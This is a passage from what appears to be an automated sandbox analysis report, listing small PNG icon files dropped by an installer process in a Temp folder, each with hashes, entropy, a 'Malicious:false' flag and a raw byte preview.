                                                                                                                                                                                                                                                          SHA-256:1B7F27805D3486ACC7D96371EA3E91436D9347D7D0E70ACE883E54BDF8ACCA40
                                                                                                                                                                                                                                                          SHA-512:2EF8B50F7FB23D219DF2AD666665A90C18E83DE24685DD17107F09100E493611C480EC73CBDC3B5CFC07B6FE60CB74506E08F01C9C9144A1A1AD541AD6B6F36F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....:IDAT8O.SAr.0.._...<.+.-?(\..v..!QwW....Pf48...Z...w>..x....{|..n.X.Y....m.....g...........*_.. .+.~..Y.?Z ......D..C......J..n...B..a.l...............,F..()`....... [ND9.n....Sr... .....ke...'...!.K...y..*TFSz.=....2.....ZQ..K...8..=.8Q@.Y.Z..y.D.a.|...(....G.0.)...g`<D.....4TA_4u....N.zp.OF....\...#.N.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):479
                                                                                                                                                                                                                                                          Entropy (8bit):7.089593114616156
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/nYc+5kz1ODz/QkR2gWWQQNjWPsiVY:SezqjQW2gfNjIsf
                                                                                                                                                                                                                                                          MD5:011D15EB16A43A3A209EF0AA0AA18EEE
                                                                                                                                                                                                                                                          SHA1:AA2B6FA0994415F1F8375FDA46EE3F3336777D9F
                                                                                                                                                                                                                                                          SHA-256:12DC59580F6AD444E19F24260219FA0B9FDDC1B5873C1F9361C2063A8DC1A4E5
                                                                                                                                                                                                                                                          SHA-512:81D9B1576636754E746523C032D822BB458D2F0FFC3632A132D3C64F32637888C5ADED498060D6020D17CC989DE96D639F8FDAA569F338ACCD810622D0C3C58B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....NIDAT8Oc`.......w...Q.+.....?>..r)5k...._....EG.G.-'.-...O.Z...p.....U..3.+m...+O..0w.....s.3.=y...Oa...O.......Z..5$.`...K.....z.........^...Y.6`.zH@.......#....ir...=.....E#(-....Z6.o...l....I2 .l....G..LZ|.....8{.....;f.@.D.a C..{...../l..?.`..fX.....4...........[g.C..9)...)......w........;CP3.. . }p.....'.......{.........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):410
                                                                                                                                                                                                                                                          Entropy (8bit):6.98484459691547
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teDEQYCdbzRpDoi7/hZTnWjiGTwiHiyiTVd7UiBwUCmi7yp:6v/78/nKEQYyb9pEm/DWjMJLiZ974
                                                                                                                                                                                                                                                          MD5:0FB46F0A45701EA2D22DCAB7E82C8B5D
                                                                                                                                                                                                                                                          SHA1:71FE89922F1F4DE4C1F7101607A18402F436069A
                                                                                                                                                                                                                                                          SHA-256:C28F498E0C59B1E3741850574D9E7F9282D4BA6F90BFE175B3F24B69561A52EC
                                                                                                                                                                                                                                                          SHA-512:B1E780BDED7AD696E28DC20FA8FEDC11C7A423D134083A6F24DA9D6044D67D1997FED26425939523B02B044FDBEA28D2C05BA039C5024B43DD87C4CECF88CD9C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8O..K..0..=....^....\.J.**.. ...Ek...T..Vt..$&}D...tf..3mRF.E.BQ+......r.....N?......O..A6.t...r.@G..r.P..r..P.1V... ;@.E..E..XS.Q@.@... ,...W......Y.#..{.p..3@........ ..`!@@w.#...."...|6.D.....=..(....|...<.@.Z.......b]....7;Z....~..K...7AN...'...L..P.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):259
                                                                                                                                                                                                                                                          Entropy (8bit):6.365804366050187
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teZ439CTUXhR7P/jlOS+sknw69p:6v/78/n1NuUXP7PIS+sknTT
                                                                                                                                                                                                                                                          MD5:845E4E3FF8D9BA304B19010CCBD47312
                                                                                                                                                                                                                                                          SHA1:04EB66B1136F8CE4B6564B32E4BB48A48CDF245A
                                                                                                                                                                                                                                                          SHA-256:52F38FE15504A9E7372B94C8881D1304C718673192CD64F0B90696F2BDC797A1
                                                                                                                                                                                                                                                          SHA-512:84BE706BEF872CC3705ECEC96C227285FC1AC3FB6DAAAD1175C6F70DB5D4603BA5859869BD1DB4AB539193971252AE0CACC7C4D769DF589C221280E15DCDB564
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....rIDAT8Oc...?.%..9.r.....$a...^...j..'....._......H6.Y3Y...L...6..i4........0>.. )D..Ah.k...-[pbX."...D...83Q.........@X....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):331
                                                                                                                                                                                                                                                          Entropy (8bit):6.6701546506374205
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teRZQUgXtmGvGDJ0IkloKlVJjh60HEwTp:6v/78/nGboZvGDQbRF9
                                                                                                                                                                                                                                                          MD5:CC83BBCB39E5B47545CBDFBABFE69864
                                                                                                                                                                                                                                                          SHA1:C2EBFD1842B6877B69F32E00AE7A55BCFA063802
                                                                                                                                                                                                                                                          SHA-256:71197BC1C1D20F42851D4F5ABD91CD47D6C52E9C0100CEC8FBCC57B2E515B4B3
                                                                                                                                                                                                                                                          SHA-512:929369F0D508A6326C0019701CA56E4694109DF2D2EE5372B6F2227F16E7FAC367263CF4065E8E493CC2D69129C116D582076040CBC71A70AF4CCD128BC62165
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc` ..t.>....9A.@E.../...b. ...`..H...Ob..).j...?.q..........0A5&!..r..T|1A......c.Wpj..R....I.....4......K......@z....4......../ ?.;~..o.4.....(.......E%z....J.@J@"..r.....".#....4.........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):459
                                                                                                                                                                                                                                                          Entropy (8bit):7.157014739512398
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/nhHoLgTdcsOkCuZ3I6xhC3kTGtjzx7:XdXau5I6pTi17
                                                                                                                                                                                                                                                          MD5:73A35AA153A7310E1DE170CE339F0242
                                                                                                                                                                                                                                                          SHA1:85016176CB165872D08073CB27F23600599F338C
                                                                                                                                                                                                                                                          SHA-256:1B7F27805D3486ACC7D96371EA3E91436D9347D7D0E70ACE883E54BDF8ACCA40
                                                                                                                                                                                                                                                          SHA-512:2EF8B50F7FB23D219DF2AD666665A90C18E83DE24685DD17107F09100E493611C480EC73CBDC3B5CFC07B6FE60CB74506E08F01C9C9144A1A1AD541AD6B6F36F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....:IDAT8O.SAr.0.._...<.+.-?(\..v..!QwW....Pf48...Z...w>..x....{|..n.X.Y....m.....g...........*_.. .+.~..Y.?Z ......D..C......J..n...B..a.l...............,F..()`....... [ND9.n....Sr... .....ke...'...!.K...y..*TFSz.=....2.....ZQ..K...8..=.8Q@.Y.Z..y.D.a.|...(....G.0.)...g`<D.....4TA_4u....N.zp.OF....\...#.N.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):362
                                                                                                                                                                                                                                                          Entropy (8bit):6.744489136613283
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPOtBUswMR/C+wZA3teVVIqGKvSdmD4lK6mj9I4OPDWwnqtzzfQ27r8aCwt2:6v/7K2sb/nK5GUonx4NMqtzzIorTtxdu
                                                                                                                                                                                                                                                          MD5:0BAB4FC0FAACC30AC714DB34333BAA54
                                                                                                                                                                                                                                                          SHA1:C5AA05973E3267D60F2C927AB67B16FCE8929118
                                                                                                                                                                                                                                                          SHA-256:4E79FBF438C1F6B197D15B08619BCCF862E7076D11C75D0B9CE3007711D94347
                                                                                                                                                                                                                                                          SHA-512:06B09980DB26DA14FB0E80EC2831A9B377112E97EAEAFF967221170A5E3D7FE70B940CCE934629CE0451D41457F1705D76B1E64181D8A9D062FA0C4BD77E34AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............,.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.6..Z......7c...x....>|.Aj@j.......`....;...F6.l.....@...A....R.3....g..f.......@.+p........R.....i.:r...Hid3(.Q.....6.G...*.#...>!`...j.r... K@.a...?r4"kD.Z..h......x..B.^......D.....`.@5..n....5.r.>y.E.".........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):386
                                                                                                                                                                                                                                                          Entropy (8bit):7.00776812280233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tedVeog/dmQEyGZ34lO47R4pyOcVuAUrm7OGBQ6bp:6v/78/nyA5dmQHuU7SpyOcVtz/Bt1
                                                                                                                                                                                                                                                          MD5:9321CA9A72F08DDF4987816DDCA3D413
                                                                                                                                                                                                                                                          SHA1:DF2EE42EB884D660440C3EBE6D8227EA443DE23A
                                                                                                                                                                                                                                                          SHA-256:46BD2F7186989CAA26BF20092F0BDBA9EC94357A69940F6C8EA16E8E5C0FAEA7
                                                                                                                                                                                                                                                          SHA-512:F37F4348594CB29622B0CEFBD8515772DE49DE8040F906209D6EA44844BDBDDE1C88DF1167B13AFF3D3BF59A41831E7895EF1B4F5C03774B1060BD8FF5D76EAA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8O./..P........a.h...a..n0..e.."XV.k........9........x....s.o.M.Z..}1MSt]W .+.....M.....E.$I.@.G.0...LA...X.%.a(..Q+6...Tr.*.h..@...9.54j.&.....JcnL.G...x.T..........Z...h.6....<..V..j..<y.f.@S2...d...O..^.T....T...{2..u.....=.q..x.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):414
                                                                                                                                                                                                                                                          Entropy (8bit):6.921441707444873
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teNq0dooGB9bqqTLPolIae+w2iYjDbg2UOj93OFo4wrbp:6v/78/nilvunTLseF2iYjfg29VOFS
                                                                                                                                                                                                                                                          MD5:6D7B39EE6BA125324EC0457FB8B1CF30
                                                                                                                                                                                                                                                          SHA1:E7B708B0D544F6B3137AB7E06914C8F318859DB3
                                                                                                                                                                                                                                                          SHA-256:7A9A198F92900BF042FEDB164367091853F9E3517B389197234889E68A05B04E
                                                                                                                                                                                                                                                          SHA-512:14CFE6B76479E2BD27E8893E2096B1A27B9B8726E3D70F64F163BEAD669E06D793AD176DF19073ECD5D491E7386A66F74E7AE8734DAC56DD292E401BD2382033
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.T .q....U.Sk6.'.a5...o..............dHd....W...0s...E+)0`.. .IrA.P....h.y..v....Y.......gff.1H....n.O.^.6..I.e#;.....G. .....n3.v...Ov.1...@..0 .a.........S...a@$0.;g.B..f.6..x!...}.!..t|........#...+..._..?..dL(.a..v.O...}.......F..8...P.3A6.'&..P.....e.K......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):259
                                                                                                                                                                                                                                                          Entropy (8bit):6.365804366050187
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teZ439CTUXhR7P/jlOS+sknw69p:6v/78/n1NuUXP7PIS+sknTT
                                                                                                                                                                                                                                                          MD5:845E4E3FF8D9BA304B19010CCBD47312
                                                                                                                                                                                                                                                          SHA1:04EB66B1136F8CE4B6564B32E4BB48A48CDF245A
                                                                                                                                                                                                                                                          SHA-256:52F38FE15504A9E7372B94C8881D1304C718673192CD64F0B90696F2BDC797A1
                                                                                                                                                                                                                                                          SHA-512:84BE706BEF872CC3705ECEC96C227285FC1AC3FB6DAAAD1175C6F70DB5D4603BA5859869BD1DB4AB539193971252AE0CACC7C4D769DF589C221280E15DCDB564
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....rIDAT8Oc...?.%..9.r.....$a...^...j..'....._......H6.Y3Y...L...6..i4........0>.. )D..Ah.k...-[pbX."...D...83Q.........@X....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):479
                                                                                                                                                                                                                                                          Entropy (8bit):7.089593114616156
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/nYc+5kz1ODz/QkR2gWWQQNjWPsiVY:SezqjQW2gfNjIsf
                                                                                                                                                                                                                                                          MD5:011D15EB16A43A3A209EF0AA0AA18EEE
                                                                                                                                                                                                                                                          SHA1:AA2B6FA0994415F1F8375FDA46EE3F3336777D9F
                                                                                                                                                                                                                                                          SHA-256:12DC59580F6AD444E19F24260219FA0B9FDDC1B5873C1F9361C2063A8DC1A4E5
                                                                                                                                                                                                                                                          SHA-512:81D9B1576636754E746523C032D822BB458D2F0FFC3632A132D3C64F32637888C5ADED498060D6020D17CC989DE96D639F8FDAA569F338ACCD810622D0C3C58B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....NIDAT8Oc`.......w...Q.+.....?>..r)5k...._....EG.G.-'.-...O.Z...p.....U..3.+m...+O..0w.....s.3.=y...Oa...O.......Z..5$.`...K.....z.........^...Y.6`.zH@.......#....ir...=.....E#(-....Z6.o...l....I2 .l....G..LZ|.....8{.....;f.@.D.a C..{...../l..?.`..fX.....4...........[g.C..9)...)......w........;CP3.. . }p.....'.......{.........IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r....CIDAT8Oc`...=./..'........x1H.^.~......p........2...b>..@..4o.u......?.j......Wt...2....\.......'./.|....`z...O..G. .0.............+{v.]Q....$...._.....x.y...@,...?~c...S....-^..... .~.....~.....?~.....s.C...o.....i..'....4..y...b.Y.s...Uo._....u.Pb..r.8..@..6d.....(.{..A... v..(iB.h..... ..................5BJ.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):288
                                                                                                                                                                                                                                                          Entropy (8bit):6.530333940085824
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teNpjvb61Qo2SAo+yeZG7q5Vp:6v/78/n+jDqQmEyeZ8g
                                                                                                                                                                                                                                                          MD5:EE2EC82FDFACF590ED0211B44987C617
                                                                                                                                                                                                                                                          SHA1:71F0AFC24952BB5C2F334C56F801470176BCCEC2
                                                                                                                                                                                                                                                          SHA-256:F8199692B7CE8D0C77D9DED524F679D64FF7723421345425B431EE933868AAC0
                                                                                                                                                                                                                                                          SHA-512:220A8C913FED060F38FCA7835D508D8D88531EF940532E8173257741433ED7FB21223CD2EE1EDDB5E770BD44AA632F8B043481CED038167901D65C74A6CC6192
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`...:.?...?....8H...`C.*\.a....V.1H.........>...ge..|...w..'...A.... 5-..`..U.}R.I. }.......y..).5..7.s.....u...?.p...t>..$.R.l ..[aR.O......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):337
                                                                                                                                                                                                                                                          Entropy (8bit):6.603752167197913
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3te+/CG3J1R7/1JrZywu9ym9mmAivY6Ppmj/jp:6v/78/nfCG3JHVywuUm9mmAiQ6Bmh
                                                                                                                                                                                                                                                          MD5:58280774747B0A7F0CA8B29DACA0B917
                                                                                                                                                                                                                                                          SHA1:0BEEDF45E1CC739DAD3886AD1532A05BDFD2A3E8
                                                                                                                                                                                                                                                          SHA-256:A7FA8ED622AECB52E7FDB363B32CC44C3A6FF5837FF78917DD177DBBE15B7DD6
                                                                                                                                                                                                                                                          SHA-512:21FCDC686E3B700753E975C7A78884E7C0EBAF0ADABF13152B199B97F7F1F6F8FBAF1295ABDA7E2FA5D81683894EB280C1AA92E6695AEA56A289E9F17AE4095E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc.....?k1Y......g...s.!.......h...,.........3x..k`>.F....`.P.S....7..O`.A4.}'.]....`..`.@4Lq..`.@4^.`....X.!..r@b."r."..l.r.P/.T..$9!..].//XG...4.|.........4..'h.H...........CK.Tl.u....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):296
                                                                                                                                                                                                                                                          Entropy (8bit):6.500966192845998
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teBQFMnlqsTJee5uicbPfZSyxX0GUd/eup:6v/78/nIQFMnkyf54rfsrpz
                                                                                                                                                                                                                                                          MD5:1374A978134A935973CAF3CD4BFD5DD6
                                                                                                                                                                                                                                                          SHA1:3A24FBE3ACDA81875702DE3DC013EA3C3B717AB5
                                                                                                                                                                                                                                                          SHA-256:DF28F5437300E6BF466FED1E74E785D4BD205ADDB1AACCBB37F51E7FD79B9C13
                                                                                                                                                                                                                                                          SHA-512:076C7993D4547042FF31C8560FC3C0A699C940CAC85668D9622E6B5F26F26C90DB5E395A1AEC0EEACDF842996A5D734FBCC310638C0D3E4C97E328419ED4000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8Oc`.&...<...I.....4N.6.?).d...7...2..{..YC...a5.b...h....A..GX1H...(6...d...p....$.^.........w.<.....@..]XJ....K...(.....X^d.2......R..G... .k..^.j....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):417
                                                                                                                                                                                                                                                          Entropy (8bit):6.94896891695791
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3te4bUHmsrNAhcSAZF8qYe+QRePg5gJjsDzEm2I81SwJL2l/sc:6v/78/nXUfyFM8q5Ig5gIzjMZSN
                                                                                                                                                                                                                                                          MD5:4C24F1DEA3731AF8E87753BF5809B7AA
                                                                                                                                                                                                                                                          SHA1:E66175AEF9B3B505215D5B8E2502C78A6662493A
                                                                                                                                                                                                                                                          SHA-256:501002F4107D366ABFD5659C858B56EF0A46C053236A83C2BF44AEAA4D41F510
                                                                                                                                                                                                                                                          SHA-512:7AE28379921677BAAD7C011A4FD5D8BC61740A4F4F51D4C726B7765AD0FA4FAE098F3B3EC6E05043DB050F2E0028265DE7A2FE7943A6462790B590FF8787C917
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8OcH....V. ..c..@._|xD....4.....a.......:r.A\..?..dt.A....'.A.P.x...H".e...}...O....H.n..G..#cl. k...b.....#cl. ..s...W..............l..n.......A.$.w...g..0<E....}...Y.,.7...s..S..?y...A.%].Q0..dq.. ...'U.DE....3.Y.l...........HpJ.e@......?y..'~...n.@.q*@....Pm...uJ....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):410
                                                                                                                                                                                                                                                          Entropy (8bit):6.98484459691547
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3teDEQYCdbzRpDoi7/hZTnWjiGTwiHiyiTVd7UiBwUCmi7yp:6v/78/nKEQYyb9pEm/DWjMJLiZ974
                                                                                                                                                                                                                                                          MD5:0FB46F0A45701EA2D22DCAB7E82C8B5D
                                                                                                                                                                                                                                                          SHA1:71FE89922F1F4DE4C1F7101607A18402F436069A
                                                                                                                                                                                                                                                          SHA-256:C28F498E0C59B1E3741850574D9E7F9282D4BA6F90BFE175B3F24B69561A52EC
                                                                                                                                                                                                                                                          SHA-512:B1E780BDED7AD696E28DC20FA8FEDC11C7A423D134083A6F24DA9D6044D67D1997FED26425939523B02B044FDBEA28D2C05BA039C5024B43DD87C4CECF88CD9C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.Paint.NET v3.5.100.r.....IDAT8O..K..0..=....^....\.J.**.. ...Ek...T..Vt..$&}D...tf..3mRF.E.BQ+......r.....N?......O..A6.t...r.@G..r.P..r..P.1V... ;@.E..E..XS.Q@.@... ,...W......Y.#..{.p..3@........ ..`!@@w.#...."...|6.D.....=..(....|...<.@.Z.......b]....7;Z....~..K...7AN...'...L..P.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):468
                                                                                                                                                                                                                                                          Entropy (8bit):7.111349425204145
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPkR/C+wZA3tezZiBETckBgamBUuzzCg5z7yDALRIjfq1iMrjWTa/IUlqauE:6v/78/nawkdmBUKf5zaIybM/WqTsY
                                                                                                                                                                                                                                                          MD5:37DA94ECD734F687EF2BD6B876BA3918
                                                                                                                                                                                                                                                          SHA1:20F07BFA0FCF04B900F5E78B503B9E7597BB652D
                                                                                                                                                                                                                                                          SHA-256:310373B5A0CA520244BBC8C21837F356781DE404EBEEAD88A44AC149B4B3EFE1
                                                                                                                                                                                                                                                          SHA-512:AF4D0182BE380DDD3972D905AE8800AA5720DD42FE62504090BBC5BF929771844C7F8DE7594851A562ED982FE3DD4EDA7B07D7177DD037C74A5D0EA510E7A863
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
